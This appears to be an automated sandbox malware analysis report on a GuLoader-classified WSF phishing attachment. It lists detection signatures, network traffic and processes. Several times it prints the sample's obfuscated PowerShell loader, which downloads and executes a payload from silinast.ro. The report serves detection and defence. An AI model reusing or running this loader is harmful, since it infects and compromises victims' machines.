Windows Analysis Report
Prosba o oferte.wsf

Overview

General Information

Sample name: Prosba o oferte.wsf
Analysis ID: 1528867
MD5: 28ce58ca6b41786b0bd031af45f91d89
SHA1: 7b72d8d9995bc61daf0074e967945ac6ed02a093
SHA256: 43f28bfd339504ab45e4a3f52f8172036e196ef40e03ffcf6d5626f87a93f0e1
Tags: wsfuser-Maciej8910871
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

AV Detection

barindex
Source: silinast.ro Virustotal: Detection: 10% Perma Link
Source: http://silinast.ro Virustotal: Detection: 10% Perma Link
Source: http://silinast.ro/Kommunikuternes.inf Virustotal: Detection: 9% Perma Link
Source: Prosba o oferte.wsf Virustotal: Detection: 8% Perma Link
Source: Prosba o oferte.wsf ReversingLabs: Detection: 13%
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.7% probability
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: 6777.6777.6777.677e
Source: global traffic DNS traffic detected: DNS query: silinast.ro
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC866B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://silinast.ro
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://silinast.ro/Kommunikuternes.infP
Source: powershell.exe, 00000009.00000002.4214260996.00000000046A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://silinast.ro/Kommunikuternes.infXR$lX
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://silinast.roXR
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://silinast.roXh
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2103502610.000002CC8590B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Source: amsi64_7468.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_7936.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B70C6B6 4_2_00007FFD9B70C6B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B70D462 4_2_00007FFD9B70D462
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B98026A 4_2_00007FFD9B98026A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B980A7A 4_2_00007FFD9B980A7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_0439F0C0 9_2_0439F0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_0439F990 9_2_0439F990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_0439ED78 9_2_0439ED78
Source: Prosba o oferte.wsf Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8354
Source: unknown Process created: Commandline size = 8354
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8354 Jump to behavior
Source: amsi64_7468.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_7936.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winWSF@11/7@2/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Selvsikkerhedens.Pan Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jpe3iyr.xo4.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7936
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Prosba o oferte.wsf Virustotal: Detection: 8%
Source: Prosba o oferte.wsf ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 